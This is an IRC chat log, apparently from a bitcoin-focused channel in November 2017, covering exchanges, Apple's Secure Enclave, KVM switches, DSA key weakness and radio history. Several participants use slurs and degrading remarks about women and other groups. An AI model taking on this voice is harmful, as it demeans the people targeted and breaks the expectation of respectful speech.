1743134;1511677395;BingoBoingo;Poor mr vulpes 1743135;1511677450;ben_vulpes;i have backups, including my usual obsessive notes from the run that brought the frankenbox up in the first place, ain't the end of the world, just the realization of some deferred losses. 1743136;1511677486;trinque;https://hackaday.com/2017/08/18/apples-secure-enclave-processor-sep-firmware-decyrpted/ << in other prying open of black boxes 1743137;1511680643;mircea_popescu;heh] 1743138;1511704817;mircea_popescu;in other naked truths, ttps://www.thesun.co.uk/wp-content/uploads/2017/06/nintchdbpict000319251588.jpg 1743139;1511704832;mircea_popescu;meh. https://www.thesun.co.uk/wp-content/uploads/2017/06/nintchdbpict000319251588.jpg 1743140;1511704962;mircea_popescu;meanwhile in "sudden & overnight moral panics / signalling fashions at Kink High usually spend a coupla years in the making", http://trilema.com/2015/the-squares-and-the-holes/ 1743141;1511705063;mircea_popescu;whole fucking #metoo bullshit was ongoing in 2015 ; outside of http://trilema.com/2016/stfu-attention-whore-culture/ nobody said anything (and sure as fuck nobody roundkicked around the house any of the mousey whinebags involved). #surprised? 1743142;1511705126;mircea_popescu;"why doesn't trilema publish something about #random-idiocy-of-today ???" "because it did years ago, back when you should have been paying attention". 1743143;1511707586;mircea_popescu;and speaking of history, here's a well forgotten bit (finally wikipedia can be useful, recent pop culture topic!) : 1743144;1511707588;mircea_popescu;"RonAndFez.com : New York's WNEW-FM was converted from a long-respected rock station to all-talk in 1999, with afternoon drive show Opie and Anthony as the focal point. Ron and Fez signed on to host an overnight talk show named Ron and Fez Dot Com, beginning February 21, 2000 and broadcast from 11pm–3am. Ron and Fez eventually moved to evenings (7:00–11:00 pm), then to early afternoon (12:00–3:00pm) and later back to th 1743145;1511707588;mircea_popescu;e evening timeslot. Buoyed by Opie and Anthony's lead-in ratings, the duo began to enjoy success. During this period, several memorable characters joined their on-air team, including taciturn producer Hawk, Dumpy, Tasteless Ginny, and the call-in prankster Joe Poo. The show's web-based premise inspired the founding of several websites devoted to the show, including RFBabies.com (once a haven for the show's cadre of young fema 1743146;1511707590;mircea_popescu;le fans), and the unofficial site for the show. Though "Dot Com" was soon dropped from the show's title, Ron and Fez have garnered an admirable online following due to RonFez.net." 1743147;1511707693;mircea_popescu;needless to say that all those websites are dead ; and that the "cadre" of young female fans is long rotten away, the 16 to 21 yo female crowd is all over what even these days ? etsy/patreon/facebook/what ? FUCKTARDS FUCKING RUINED THE GROUPIE! 2010s are a regression to fucking 1950, holy hell, gotta have elvis come back to shake his hips once more ? 1743148;1511707722;mircea_popescu;WNEW-FM didn't suck in the 90s. where is it. what happened. questions! 1743149;1511707803;cruciform;http://trilema.com/2015/the-squares-and-the-holes/#footnote_5_63723 <- wonderful! cannot wait for the end of the fiat-enabled welfare/warfare state, with all its attendant pervsersions 1743150;1511707818;mircea_popescu;cruciform did you notice the cartoon with the baby turtles ? 1743151;1511707855;cruciform;mircea_popescu: haven't got to that section yet :) 1743152;1511707862;mircea_popescu;aok. 1743153;1511709114;mircea_popescu;and in other radio news, http://edition.cnn.com/2014/07/04/showbiz/celebrity-news-gossip/anthony-fired-tweets-opie-and-anthony/index.html 1743154;1511724655;ag3nt_zer0;re: bitfinex tether usdt - mtgox 2.0? https://medium.com/@bitfinexed 1743155;1511724967;asciilifeform;ag3nt_zer0: see also http://www.loper-os.org/?p=1446 1743156;1511724978;asciilifeform;ag3nt_zer0: participation in goxes, of any and all forms, is OPTIONAL 1743157;1511725055;ag3nt_zer0;good morning asciilifeform... thx! looking for reliable info... 1743158;1511725160;asciilifeform;lol 'reliable info' on what 1743159;1511725170;asciilifeform;lemme guess, on 'the right time to get out of this particular gox' ?? 1743160;1511725187;asciilifeform;the answer is... there is no right time to be IN it to begin with 1743161;1511725203;asciilifeform;and having been 'in' it to begin with at ANY point is symptomatic of severe problems ~on your end~ 1743162;1511725267;asciilifeform;whole. fucking. point. of. bitcoin. is that you dun need a gox. never, for nothing, at no point. 1743163;1511725324;asciilifeform;http://btcbase.org/log/2017-11-26#1743153 << fwiw i never heard of either of these 1743164;1511725324;a111;Logged on 2017-11-26 15:11 mircea_popescu: and in other radio news, http://edition.cnn.com/2014/07/04/showbiz/celebrity-news-gossip/anthony-fired-tweets-opie-and-anthony/index.html 1743165;1511725346;asciilifeform;http://btcbase.org/log/2017-11-26#1743139 << or of this. wtf is that ? 1743166;1511725346;a111;Logged on 2017-11-26 14:00 mircea_popescu: meh. https://www.thesun.co.uk/wp-content/uploads/2017/06/nintchdbpict000319251588.jpg 1743167;1511725390;asciilifeform;http://btcbase.org/log/2017-11-26#1743136 << lulzily, observe that this is coming out just about immediately when crapple PHASED OUT the chip ( it got replaced with the face mugshot idiocy ) 1743168;1511725390;a111;Logged on 2017-11-26 06:24 trinque: https://hackaday.com/2017/08/18/apples-secure-enclave-processor-sep-firmware-decyrpted/ << in other prying open of black boxes 1743169;1511725438;asciilifeform;http://btcbase.org/log/2017-11-26#1743132 << didja resize ~down~ ?? afaik resizing down never, at any point, worked ~anywhere. 1743170;1511725438;a111;Logged on 2017-11-26 06:22 ben_vulpes: no idea why resizing sda3 would kill my poor gentoo, but lo, i killed her jim. 1743171;1511725443;trinque;neh, thought the faceID thing used the "secure enclave" too 1743172;1511725460;asciilifeform;hm, does it ? i'll admit, i did not follow in real time. 1743173;1511725470;trinque;https://support.apple.com/en-us/HT208108 << aha, state of the art!!11! 1743174;1511725516;asciilifeform;lolk 1743175;1511725536;asciilifeform;'Even if you don’t enroll in Face ID, the TrueDepth camera intelligently activates to support attention aware features, like dimming the display if you aren't looking at your iPhone or lowering the volume of alerts if you're looking at your device. For example, when using Safari, your device will check to determine if you're looking at your device and turns the screen off if you aren’t.' << ahahahhawut 1743176;1511725563;asciilifeform;hey recall that patent, 'test if plebemeat is actually looking at the ads, if not -> no jam for supper' ? 1743177;1511725566;asciilifeform;apparently live nao. 1743178;1511725596;asciilifeform;'Users with physical limitations can select “Accessibility Options” during enrollment that doesn't require the full range of head motion to capture different angles' << but at least one can register Officially as a tard !111 and cheat. 1743179;1511725606;asciilifeform;for now. 1743180;1511725663;hanbot;sounds like compulsory buttplug is right around the corner 1743181;1511725675;asciilifeform;verily. 1743182;1511725697;asciilifeform;http://btcbase.org/log/2017-11-26#1743129 << is asciilifeform the only one who had some hope that this was a serious post ? 1743183;1511725697;a111;Logged on 2017-11-26 06:15 deedbot: http://www.contravex.com/2017/11/26/specs-and-designs-for-the-first-ever-bugatti-comps/ << Contravex: A blog by Pete Dushenski - Specs and designs for the first ever Bugatti-Comps. 1743184;1511726000;ag3nt_zer0;asciilifeform reliable info just meaning a look at the situation from an area of the btc world that isn't full of shit - HERE being the only place I trust... and re: "no right time to be in it" I am assuming you mean having control of private keys at all times and that if I am really interested in trading in a "reliable" way that I should be doing it here?, via WOT channels? or am I in outerspace herE? 1743185;1511726043;asciilifeform;!~ticker --market all 1743186;1511726052;jhvh1;asciilifeform: Bitstamp BTCUSD last: 9100.02, vol: 10602.28780808 | Bitfinex BTCUSD last: 9240.2, vol: 61199.18993364 | Kraken BTCUSD last: 9085.7, vol: 3027.16298779 | Volume-weighted last average: 9214.08800107 1743187;1511726066;asciilifeform;ag3nt_zer0: correct, control of private keys. 1743188;1511726123;asciilifeform;but at the very least, if yer gonna put someone else at your reactor controls, have it be somebody you can actually rate. 1743189;1511726390;asciilifeform;ag3nt_zer0: see also http://btcbase.org/log/2017-11-23#1742484 thread, and elsewhere. 1743190;1511726390;a111;Logged on 2017-11-23 16:17 mircea_popescu: also that ballas quote re giving up the capital. 1743191;1511726398;ben_vulpes;asciilifeform: i was hoping for eg trinary circuits, dataflow fabric, but quickly disappoint. 1743192;1511726430;ben_vulpes;also did manage to resurrect box by regenerating mbr with lilo 1743193;1511726442;asciilifeform;ben_vulpes: was hoping for something, anything, other than monkey noises. but disappoint. 1743194;1511726520;ben_vulpes;gotta recalibrate yr expectations, i guess 1743195;1511731687;deedbot;http://trilema.com/2017/lets-de-ballas-a-ballas-piece-on-rape-well-on-rape-anyway-but-its-with-sexing-genders-and-interns-so-you-know/ << Trilema - Let's de-Ballas a Ballas piece. On rape. Well... on "rape", anyway. But it's with sexing genders and interns so you know... 1743196;1511732058;mircea_popescu;http://btcbase.org/log/2017-11-26#1743165 << that is the 30mn entrepreneur, http://trilema.com/2014/holy-shit-technical-analysis-is-real/#footnote_0_57849 1743197;1511732058;a111;Logged on 2017-11-26 19:42 asciilifeform: http://btcbase.org/log/2017-11-26#1743139 << or of this. wtf is that ? 1743198;1511732085;mircea_popescu;(surprisingly to no one but the sort that get surprised by such things, kim kardashians' us pics are heavily edited.) 1743199;1511732122;mircea_popescu;the previous item are radio hosts, a major underpinning of us counterculture throughout the 70s and 80s. not really much left by the 90s, and totally gone now. 1743200;1511732195;mircea_popescu;http://btcbase.org/log/2017-11-26#1743180 << honestly this isn't even such a bad idea. 1743201;1511732195;a111;Logged on 2017-11-26 19:47 hanbot: sounds like compulsory buttplug is right around the corner 1743202;1511732227;mircea_popescu;(for the harem, obviously, not so much for harem-wannabes, but that's aside ) 1743203;1511732313;mircea_popescu;http://btcbase.org/log/2017-11-26#1743184 << consider at some point switching from this situation where you keep trying to entice us to look at shit to where you actually contribute something yourself. it'll be a lot better for you. 1743204;1511732313;a111;Logged on 2017-11-26 19:53 ag3nt_zer0: asciilifeform reliable info just meaning a look at the situation from an area of the btc world that isn't full of shit - HERE being the only place I trust... and re: "no right time to be in it" I am assuming you mean having control of private keys at all times and that if I am really interested in trading in a "reliable" way that I should be doing it here?, via WOT channels? or am I in outerspace herE? 1743205;1511740512;deedbot;http://www.loper-os.org/?p=1927 << Loper OS - The Peculiarly Quiet Decline and Fall of the KVM 1743206;1511745187;mircea_popescu;http://btcbase.org/log/2017-11-26#1743205 << IPKVM, obviously. 1743207;1511745187;a111;Logged on 2017-11-26 23:55 deedbot: http://www.loper-os.org/?p=1927 << Loper OS - The Peculiarly Quiet Decline and Fall of the KVM 1743208;1511745196;asciilifeform;for 4k?!?!! 1743209;1511745215;mircea_popescu;i don't think anyone uses kvm in the sense you use it. 1743210;1511745262;asciilifeform;it's a box, that at one time was sold everywhere, and worked with the gear of the time 1743211;1511745273;asciilifeform;1 display <-> n comps 1743212;1511745278;asciilifeform;with hand toggle 1743213;1511745321;mircea_popescu;it's a box, which was once driven by the needs of people offering ISP services, which was consequently sold everywhere and which you picked up and used in your own way. meanwhile the people that drove the kvm item moved on, leaving you stranded. because how you use it and how they use it were never fundamentally the same, just briefly appeared that way. 1743214;1511745348;asciilifeform;0 to do with the isp item (ipkvm) -- wholly different gadget that suffers from misfortunately collided name. 1743215;1511745362;asciilifeform;used to operate moar comps in a room than there is room for consoles. 1743216;1511745369;mircea_popescu;not at all. kvm item appeared to serve the isp market, not the alf market. 1743217;1511745402;asciilifeform;http://content.us.dlink.com/wp-content/uploads/2014/03/DKVM4Ksidesitecore.png << conventional 1990s (vga) kvm, for reference. 0 connection to isp remote kvm 1743218;1511745418;mircea_popescu;obviously 1990s tech will not reference 2010 tech wtf nonsense is this. 1743219;1511745432;mircea_popescu;that "conventiona 1990 vga kvm" EXISTS so that people in the noc can look at their god damned comps 1743220;1511745443;mircea_popescu;not so you can do pcb layouting 1743221;1511745445;asciilifeform;kvm apparently even deader than asciilifeform thought, if mircea_popescu managed to entirely forget that it existed. 1743222;1511745451;mircea_popescu;jesus christ. 1743223;1511745481;mircea_popescu;asciilifeform the only place i ever used one, in the 90s, WAS IN DATACENTER. not at your fucking house. 1743224;1511745484;asciilifeform;and yes i had massive one when i was a bofh. 32 holes. and yes these still sold. 1743225;1511745489;asciilifeform;( 32 vga hole. ) 1743226;1511745625;asciilifeform;i suspect that mircea_popescu is right in re why the hand-cranked items sold today are still vga-only -- they are for use of gnomes, in the mines. 1743227;1511745645;asciilifeform;( why remote-controlled box is vga-only is not a mystery ) 1743228;1511745717;mircea_popescu;right. 1743229;1511745758;mircea_popescu;nobody even had a decent monitor in the whole fucking noc. half of them at that point still fuckling tandys or whatever the fuck bicolor cgas. 1743230;1511745810;asciilifeform;today you'll see folx use rack mount lcd, slides out sorta like an oven door 1743231;1511745830;mircea_popescu;yes, but not ideal (gotta go over to the box). 1743232;1511745833;asciilifeform;( if you ever wonder where surplus 1990s tft panels go -- they went to make these. ) 1743233;1511745866;asciilifeform;right, they're used for per-rack hand-cranked sweat -- sorta like those rack-mount rotary phones one sees in photos of old pbxen 1743234;1511745903;mircea_popescu;i wonder if ppl even have any fucking clue WHY it's "~dial~ tone". 1743235;1511745918;asciilifeform;folx who never pulsedialed -- likely not 1743236;1511745947;mircea_popescu;comes, originally, when this newfanged tech was new and needed a name, from a different item that was common curriculum and meanwhile disappeared 1743237;1511745949;mircea_popescu;the SUNDIAL. 1743238;1511745963;asciilifeform;sundial still lives, wat 1743239;1511745970;mircea_popescu;where ? 1743240;1511745971;asciilifeform;there's one not far from asciilifeform 1743241;1511745980;mircea_popescu;see if anyone can read it. 1743242;1511746006;*;mircea_popescu lived this recently, very elegant vertical 1920s style item, on wall. "what interesting art" "it's a fucking sundial" "a what ?!" 1743243;1511746048;asciilifeform;next mircea_popescu will say that modern anglo kidz dun laugh at the wrist-sundials in 'flintstone' cartoon. 1743244;1511746049;mircea_popescu;(phone was new and needed name... in the 80s. the other 80s.) 1743245;1511746055;mircea_popescu;asciilifeform i say. 1743246;1511746059;asciilifeform;nuts. 1743247;1511746257;asciilifeform;but indeed goes back to subj of thread, asciilifeform is stuck with 1880s state of the art, i.e. plugboard, for switching console b/w boxen, in a room where there is simply nomoar wall to hang moar lcd onto. 1743248;1511746307;asciilifeform;( why not over ip ? well for starters not all of the boxes have nics. or run an os that knows what is a nic ! ) 1743249;1511747412;mircea_popescu;you know back in the day she worked for the usaf, chet had a buncha crap systems that had to interop, ended up plugging them all on a hunk of wood to switch manually ? 1743250;1511747434;asciilifeform;i can picture. 1743251;1511747437;mircea_popescu;there's nothing more perennial than 1880s tech, in the 1960s as in the 2010 1743252;1511747455;mircea_popescu;back then everything came with its own apple-style keyboard etc, nothing fucking worked. subtly. 1743253;1511747511;asciilifeform;i suppose the only thing remaining after 1880s plugboard is the final rock bottom : http://btcbase.org/log/2014-04-25#643498 1743254;1511747511;a111;Logged on 2014-04-25 20:09 asciilifeform: mircea_popescu: did you ever encounter the tale of 'подвиг радиста' as schoolboy? 1743255;1511747523;asciilifeform;( http://btcbase.org/log/2014-04-25#643502 ) 1743256;1511747523;a111;Logged on 2014-04-25 20:09 asciilifeform: mircea_popescu: http://www.stalingrad-battle.ru/images/stories/ris42.jpg 1743257;1511747547;mircea_popescu;heh. 1743258;1511747574;mircea_popescu;!#s ecaterina teodoroiu 1743259;1511747574;a111;0 results for "ecaterina teodoroiu", http://btcbase.org/log-search?q=ecaterina%20teodoroiu 1743260;1511747593;mircea_popescu;^ ww1 machinegunner woman. 1743261;1511747608;asciilifeform;( and i gotta disagree re 'nothing fucking worked, subtly' -- things fucking didn'twork ~honestly~ and in plain daylight. it's today that they dysfunction subtly.) 1743262;1511747652;mircea_popescu;to hear the woman retell it, it was more a case of ww2 russian materiel, "we made a buncha duds so now we're gonna call this a new standard rather than throw them out" 1743263;1511747745;asciilifeform;https://archive.is/M0rJY << notbad.jpg 1743264;1511747766;mircea_popescu;i thought youy'd like! 1743265;1511747771;*;asciilifeform likes. 1743266;1511747867;asciilifeform;'Inainte baieti, nu va lasati, sunteti cu mine! Inainte! Razbunati-ma!' 1743267;1511747936;mircea_popescu;dja know how despicable faggots of the interwar (such as, eminently, bedwetter blair) were "indignant" at "the cruel and violent sport of boxing" especially because "of how it makes a minority of women behave" ? 1743268;1511747951;mircea_popescu;fucking scum of all time, those are the only women anyone even wants! 1743269;1511747960;asciilifeform;afaik just him, i know of no other source for the item 1743270;1511747964;mircea_popescu;"not when anyone's three year old" "yes, well." 1743271;1511747990;mircea_popescu;asciilifeform i heard it pluriously, much like the whole "if men just went out to rape and pillage there'd be ANARCHY!!!1" 1743272;1511747998;mircea_popescu;"and other bad things!!! all the bad things!!!" 1743273;1511748010;mircea_popescu;or the exact equivalent, "if there were no state THE WORLD WOULD END!1111" 1743274;1511748027;mircea_popescu;it's this diffuse mula-dom. 1743275;1511748066;asciilifeform;i suspect some mentally weak folx have problems with abstraction. i.e. ~his~ 'world will end' and thereby somehow 'world will end' 1743276;1511748094;mircea_popescu;you don't say. 1743277;1511748130;mircea_popescu;arabs believed "if one doesn't believe in god, no matter which as long as one" world also ends. looked at me as you'd look at something thart crawled out of black hole. 1743278;1511748137;mircea_popescu;"BUT IT IS NOT POSSIBLE!! I USED THE JUICE!!!" 1743279;1511748187;asciilifeform;similar reaction if you invite an american d00d into a house with no tv set 1743280;1511748192;asciilifeform;'but where is it!' 1743281;1511748199;mircea_popescu;for srs. 1743282;1511748214;mircea_popescu;anyway, i suppose this is the proper definition of divinity. 1743283;1511748232;mircea_popescu;"spurious item which the superficial mind regards as the universal underpinning of existence" 1743284;1511748270;mircea_popescu;usian can not comprehend existence unless tv explains it to him ("how does the news relate to me?!?!"), arab hasta have the allah basis, socialist needs the state to, conceptually, assuage his existential anxieties and so following. 1743285;1511748304;*;asciilifeform suspects that sufficiently advanced cases of 'homo americanus' don't actually require existence to have, in their heads, an underpinning at all. but asciilifeform has not sufficient entomological field experience, to say if this is a thing yet. 1743286;1511748329;mircea_popescu;je n'ai pas eu besoin de cette hypothese a lot more radical than originally thought. 1743287;1511748370;asciilifeform;wai wasn't that herr newton 1743288;1511748427;asciilifeform;or did it happen that he actually said it in fr 1743289;1511748462;mircea_popescu;laplace. 1743290;1511748488;asciilifeform;that'd explain. 1743291;1511748501;mircea_popescu;amusingly, he was "french newton" 1743292;1511748506;asciilifeform;sorta. 1743293;1511749243;asciilifeform;meanwhile in the idjit pit, http://www.loper-os.org/?p=1927&cpage=1#comment-18295 1743294;1511749343;mircea_popescu;you're too hard on the general public. 1743295;1511749414;asciilifeform;see also http://btcbase.org/log/2017-10-20#1727334 1743296;1511749414;a111;Logged on 2017-10-20 19:29 mircea_popescu: http://btcbase.org/log/2017-10-20#1727313 << you'd be fucking surprised how often this is the case. "hello sir, this is bank, it just doesn't do any banking, problem ?" 1743297;1511749448;asciilifeform;'we're all out of prime rib, but wouldntcha like some maggot by the pound ? we have all the maggots you could use!' 1743298;1511749476;asciilifeform;'how is it not the same thing!' 1743299;1511749514;mircea_popescu;heh. 1743300;1511751453;*;BingoBoingo counting down the days left of winter 1743301;1511752059;asciilifeform;for BingoBoingo not so much left of this winter! 1743302;1511752065;BingoBoingo;Aha 1743303;1511752129;BingoBoingo;asciilifeform: Do you have a coup flying day set yet? 1743304;1511752139;asciilifeform;BingoBoingo: nope. 1743305;1511752183;BingoBoingo;Still worried about .ro language write head, or ? 1743306;1511752218;asciilifeform;it, and that ticker need to go some moar up. 1743307;1511752372;*;BingoBoingo forgets alf has to care/feed/bed the pet 1743308;1511752392;asciilifeform;pet is by far the easiest part. 1743309;1511752407;asciilifeform;pet is a second pair of hands and in fact eats not so much. 1743310;1511754597;mircea_popescu;in other news, "come play with me" (1977) is such a confusing piece of nonsense... 1743311;1511755449;mircea_popescu;meanwhhile in healthy youth, http://78.media.tumblr.com/tumblr_m4vrx26LgH1rvqneyo1_1280.jpg 1743312;1511756047;BingoBoingo;http://www.jameslafond.com/article.php?id=9648 1743313;1511756073;asciilifeform;mircea_popescu: wassat 4u box thing in the back..? 1743314;1511756316;mircea_popescu;KVM!!!1 1743315;1511767662;diana_coman;http://btcbase.org/log/2017-11-27#1743279 <- I had this with cypriots too; bbbut no tv? not *even* where you sit with friends? what do you do?? well, we...talk, you know; to be fair I've put that on account of youth rather than more generic rot but maybe I was wrong 1743316;1511767662;a111;Logged on 2017-11-27 02:03 asciilifeform: similar reaction if you invite an american d00d into a house with no tv set 1743317;1511769094;mircea_popescu;few people can get through any social call without tv support. which is how they ended up invading bars etc. 1743318;1511791081;mircea_popescu;!!up kjj 1743319;1511791082;deedbot;kjj voiced for 30 minutes. 1743320;1511791336;kjj;were withdrawls delayed because of the holiday weekend? 1743321;1511791348;mircea_popescu;what withdrawals ? 1743322;1511791400;kjj;I put in a request on the 25th. haven't seen anything on that address yet 1743323;1511791446;mircea_popescu;yes but where did you put it ? 1743324;1511791519;kjj;mpex.biz textbox as usual 1743325;1511791530;mircea_popescu;ah. will look into it. 1743326;1511791582;mircea_popescu;!!key kjj 1743327;1511791583;deedbot;http://wot.deedbot.org/19F1FBD703330401EE654DAB5D91317ED300C048.asc 1743328;1511791671;mircea_popescu;!!rate kjj 1 Ancient. 1743329;1511791674;deedbot;Get your OTP: http://p.bvulpes.com/pastes/nD0Nf/?raw=true 1743330;1511791984;mircea_popescu;kjj you can now self-voice btw. send !!up to deedbot in a pm whenever needed. 1743331;1511792457;mircea_popescu;kjj http://p.bvulpes.com/pastes/iNoOh/?raw=true 1743332;1511792536;kjj;thanks 1743333;1511792543;mircea_popescu;my pleasure. 1743334;1511793921;mircea_popescu;trinque http://p.bvulpes.com/pastes/qrKUM/?raw=true 1743335;1511794118;asciilifeform;https://archive.is/3i3U4 << in other lulz. 1743336;1511794161;asciilifeform;'Prague's High Court on November 24 upheld a lower court's ruling allowing the extradition of Yevgeny Nikulin, whom the United States accuses of hacking computers and stealing information from major Internet companies including LinkedIn and Dropbox.' 1743337;1511794221;mircea_popescu;why the czech republic ? 1743338;1511794229;mircea_popescu;o, right, teh cuntlets huh. 1743339;1511794235;asciilifeform;that makes... 4th? 'вредитель' kidnapped by usg from 'neutral' cuntry this yr ? 1743340;1511794248;mircea_popescu;bohemia never independent. 1743341;1511794256;asciilifeform;troo 1743342;1511794259;mircea_popescu;dood ~could~ have just sat his ass down in belgrade, bussed the hos in from prague 1743343;1511794263;mircea_popescu;but no, gotta be dumb. 1743344;1511794274;asciilifeform;belgrade not colonized yet ? 1743345;1511794404;mircea_popescu;i dunno, i kinda dun see the "sorry, avion ti gori" folk upholding any rulings. 1743346;1511794584;mircea_popescu;asciilifeform http://p.bvulpes.com/pastes/P9rhc/?raw=true 1743347;1511796820;trinque;mircea_popescu: sure can 1743348;1511796864;asciilifeform;mircea_popescu: got it! 1743349;1511796876;asciilifeform;mircea_popescu: and yes that was pretty clear. 1743350;1511798776;deedbot;kjj: gpg: error reading key: public key not foundhttp://p.bvulpes.com/pastes/EMRuw/?raw=true 1743351;1511798793;trinque;lol 1743352;1511798860;asciilifeform;waiwat how's that work. to what did deedbot encrypt the message then ? 1743353;1511798861;deedbot;kjj: http://p.bvulpes.com/pastes/uJZQW/?raw=true 1743354;1511798915;trinque;mmm apparently the correct key 1743355;1511806318;asciilifeform;http://btcbase.org/log/2017-11-27#1743327 << lol, dsa and elgamal !! 1743356;1511806318;a111;Logged on 2017-11-27 14:06 deedbot: http://wot.deedbot.org/19F1FBD703330401EE654DAB5D91317ED300C048.asc 1743357;1511806337;asciilifeform;and, bonus, sha1 flag for sigs 1743358;1511806349;asciilifeform;a trifecta. 1743359;1511806387;asciilifeform;and in 2012.. 1743360;1511806488;asciilifeform;( for n00bz : ~one~ failure of rng leaks entire privkey, in dsa. ) 1743361;1511806575;asciilifeform;sadly for kjj, as i understand he is stuck with this key 4evah, unless he wants to buy a boeing for mpex... 1743362;1511806632;asciilifeform;moral -- measure seven times, cut once, etc. ( asciilifeform for instance is stuck with a 2048b rsa, at least until we finally throw gpg ) 1743363;1511806755;asciilifeform;in other olds, https://arxiv.org/abs/1501.00447v1 1743364;1511806878;asciilifeform;( see also http://btcbase.org/log/2015-12-19#1347996 and elsewhere. ) 1743365;1511806878;a111;Logged on 2015-12-19 22:55 punkman: "I actually have two implementations of example malicious signers:  One produces non-deterministic signatures and leaks a 256 bit private key, to the holder of a specific public key and no one else, in ~33 signatures with very high probability (failure rate of 1 in 1000 for 33 signatures, around 1 in a million for 34). The other produces a seemingly RFC 6979 like deterministic signatures and 1743366;1511807653;asciilifeform;meanwhile, in deaths: http://www.colorforth.com is now a link farm. 1743367;1511807670;ben_vulpes;awwwww 1743368;1511807682;ben_vulpes;nobody cares about dns records anymore apparently 1743369;1511807718;ben_vulpes;also earthlink, bless 1743370;1511807732;asciilifeform;https://colorforth.github.io/index.html << he moved to shithub, apparently. 1743371;1511807804;asciilifeform;chuck moore's http://www.greenarraychips.com still alive. 1743372;1511807900;asciilifeform;http://www.ultratechnology.com/color4th.html << text transcript of moore's speech re colorforth . 1743373;1511807995;asciilifeform;'I am utterly frustrated with the software I have to deal with. Windows is beyond comprehension! UNIX is no better. DOS is no better. There is no reason for an OS. It is a non-thing. Maybe it was needed at one time.' etc. 1743374;1511809540;BingoBoingo;!~ticker --market all 1743375;1511809545;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 9515.0, vol: 15398.84215450 | Bitfinex BTCUSD last: 9514.8, vol: 76883.33269031 | Kraken BTCUSD last: 9469.9, vol: 3428.4299081 | Volume-weighted last average: 9513.22382425 1743376;1511814855;mircea_popescu;http://btcbase.org/log/2017-11-27#1743362 << hopefully that's 2018. 1743377;1511814855;a111;Logged on 2017-11-27 18:17 asciilifeform: moral -- measure seven times, cut once, etc. ( asciilifeform for instance is stuck with a 2048b rsa, at least until we finally throw gpg ) 1743378;1511814903;asciilifeform;mircea_popescu: i've cut ffa into 30 pieces, each ~1 pg; -> bl0g article. 1743379;1511814953;mircea_popescu;o hey. 1743380;1511814954;asciilifeform;( each own ada compilationunit. ) 1743381;1511814969;asciilifeform;builds a static .a lib, linkable. 1743382;1511814969;mircea_popescu;do what i did when i leaked teh wikileaks, set it to publish one per hour or such 1743383;1511814996;asciilifeform;yea, could ( tho i imagine a serious reader will need somewhat moar than 1hr to follow along ) 1743384;1511815049;mircea_popescu;so whatever, 6/day 1743385;1511815056;asciilifeform;the other notion is that each shot oughta be a vpatch from previous . so also vtronics practice. 1743386;1511815067;mircea_popescu;not a bad idea. 1743387;1511815070;asciilifeform;( rather than release of whole thing as 'born grown' genesis ) 1743388;1511815091;asciilifeform;it will make apparent what the logical structure of the thing is. 1743389;1511815103;asciilifeform;( which pieces make use of which other ) 1743390;1511815109;mircea_popescu;aha. 1743391;1511815153;mircea_popescu;if it's worth writing, it's worth writing well. if it's work writing well, it's worth publishing well. if it's worth publishing well, it's worth reading. and so on. 1743392;1511815205;diana_coman;http://btcbase.org/log/2017-11-27#1743378 <- yay; I'll read! 1743393;1511815205;a111;Logged on 2017-11-27 20:35 asciilifeform: mircea_popescu: i've cut ffa into 30 pieces, each ~1 pg; -> bl0g article. 1743394;1511815209;mircea_popescu;the cnat raed crowd of brogrammers didn't get ONE thing wrong. they got a whole list of things wrong (that they think is one single thing, but then again primitive man also has a single word for enemy, be it wolbachia, wolves or western men. 1743395;1511815238;asciilifeform;currently asciilifeform is barfing over the fact that adacore's gnat is happy to build static 'independent library' .a while gpl gcc's gnat barfs 1743396;1511815268;asciilifeform;the latter is the source of 100% of the tears in the l0gz to date re 'it dun go' 1743397;1511815315;diana_coman;mircea_popescu, rot or non-rot shows equally at all levels, so it's rather hard to get much of a mixture of either side of it 1743398;1511815320;asciilifeform;i'd naively expect that adacore's item would be the satanic one, and gcc's fork -- the functional. but so far in no case was this the finding. 1743399;1511815461;mircea_popescu;in other fake news / mass media lulz, i read in today's la nacion that bitcoin went over 8k usd, and that various nobodies leeching the tax chest opine as to how "items not backed by anything are risky". 1743400;1511815476;mircea_popescu;somehow it's 2012 again and the item not backed by anything is bitcoin, not the various fiats. 1743401;1511815518;mircea_popescu;"bitch, really, what is the united states dobaloo backed by ?!" "the full faith and credit of the us government!!" "you mean like... the webpage by that name ?!" "no no there's so much more to it than that!!1" "im sure." 1743402;1511815532;diana_coman;to me it seems they rehash that ~every time it jumps up in price by 1k or so 1743403;1511815590;trinque;can't wait to read, asciilifeform 1743404;1511815593;trinque;and use 1743405;1511815807;mircea_popescu;diana_coman ayup. but it's funny, you know, dude in a toyota going "hey mister, shitty imports are not reliable cars". 1743406;1511815808;mircea_popescu;doh ? 1743407;1511815836;mircea_popescu;you'd think it's sheer postmodernism, thief yelling thief and the dudes sitting atop piles of unbacked paper derping about how bitcoin is "risky because not backed by anything" 1743408;1511815845;mircea_popescu;only thing to be backed by something out of the whole field. 1743409;1511815921;mircea_popescu;(but it's cracking ; for instance the supposedly captured fmi is putting out notions of how countries should probably monetize bitcoin rather than other countries currencies. so dixit lagarde. who, i suppose, has been raping hotel maids in new york according to the usg suto dept.) 1743410;1511815922;diana_coman;eh, it's postmodernism in the usual sense that "this word here doesn't mean what it means anymore but something else I decided"; aka "backed" now means as far as I heard "but everyday transactions happen still in fiat" 1743411;1511815954;mircea_popescu;i'm all for it, too. let the pretend sovereigns pay for the cost of circulating monetary mass. 1743412;1511815964;mircea_popescu;cuck wants to pretend, let him pick up the tab. 1743413;1511816033;diana_coman;yeah, I just can't see the "logic" in that "definition" but not really expecting it by now anyway; perhaps it's more of "but this is what we know and it's been around for x years therefore it is solid" 1743414;1511816051;mircea_popescu;o yeah totally. 1743415;1511816064;mircea_popescu;i suppose i should put up a video lighting cigars with benjies or something. 1743416;1511816113;diana_coman;lol; those aren't plastic at least, are they 1743417;1511816142;mircea_popescu;afaik still linen paper. 1743418;1511816671;asciilifeform;light but dun inhale, thing is full of rare earths and nao also polymer crapolade 1743419;1511816695;asciilifeform;( would be interesting to burn it and mass spec, see exactly what inside. ) 1743420;1511816706;ben_vulpes;DRM violation alert!!1 1743421;1511816717;asciilifeform;and what % cocaine 1743422;1511816911;asciilifeform;http://btcbase.org/log/2017-11-27#1743408 << what's it even mean for something to be ~honestly~ backed ? even in era when various paper moneys were theoretically 'backed in gold' what would have happened if million folx walked in to claim their au ? 1743423;1511816911;a111;Logged on 2017-11-27 20:50 mircea_popescu: only thing to be backed by something out of the whole field. 1743424;1511816937;asciilifeform;as i understand it, whole idea of 'backed currency' is 